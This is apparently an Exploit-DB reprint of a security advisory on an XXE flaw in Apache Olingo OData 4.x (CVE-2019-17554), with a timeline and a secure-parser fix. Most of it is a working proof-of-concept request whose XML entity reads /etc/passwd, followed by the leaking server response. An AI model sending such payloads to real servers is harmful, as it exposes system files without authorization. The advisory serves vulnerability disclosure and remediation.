Apache Olingo OData 4.0 XML External Entity Resolution (XXE)

vendor:

Apache Olingo OData 4.0

by:

Archibald Haddock

5.5

CVSS

MEDIUM

XML External Entity Resolution (XXE)

611

CWE

Product Name: Apache Olingo OData 4.0

Affected Version From: Olingo OData 4.x.x

Affected Version To: Olingo OData 4.6.x

Patch Exists: YES

Related CWE: CVE-2019-17554

CPE: a:apache:olingo_odata:4.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2019

Apache Olingo OData 4.0 XML External Entity Resolution (XXE)

The XML content type entity deserializer is not configured to deny the resolution of external entities. Request with content type 'application/xml', which trigger the deserialization of entities, can be used to trigger XXE attacks.

Mitigation:

Upgrade to Olingo OData 4.7.0 or later versions.

Source

Exploit-DB raw data:

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Apache Olingo OData 4.0
# Vendor:   Apache Foundation
# CSNC ID:  CSNC-2009-025
# CVE ID:   CVE-2019-17554
# Subject:  XML External Entity Resolution (XXE)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Archibald Haddock (advisories@compass-security.com)
# Date:     08.11.2019
#
#############################################################

Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].



Affected:
---------
Vulnerable:
 * Olingo OData 4.x.x to 4.6.x

Not vulnerable:
 * Olingo OData 4.7.0
 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01

Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the resolution of external entities.
Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.

Request
======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
  <a:id>Cars(1)</a:id>
  <a:title></a:title>
  <a:summary></a:summary>
  <a:updated>2019-11-08T15:10:30Z</a:updated>
  <a:author>
    <a:name></a:name>
  </a:author>
  <a:link rel="edit" href="Cars(1)"></a:link>
  <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
  <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
  <a:content type="application/xml">
    <m:properties>
      <d:Id m:type="Int16">1</d:Id>
      <d:Model>F1 &xxe;</d:Model>
      <d:ModelYear>2012</d:ModelYear>
      <d:Price m:type="Decimal">189189.43</d:Price>
      <d:Currency>EUR</d:Currency>
    </m:properties>
  </a:content>
</a:entry>

Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>


Workaround / Fix:
-----------------
Configure the XML reader securely [3].

In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();

The XMLInputFactory should be configured, not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);


Timeline:
---------
2019-11-08:     Discovery by Compass Security
2019-11-08:     Initial vendor notification
2019-11-08:     Initial vendor response
2019-12-04:     Release of fixed Version / Patch [4]
2019-12-05:     Coordinated public disclosure date


[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E

Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt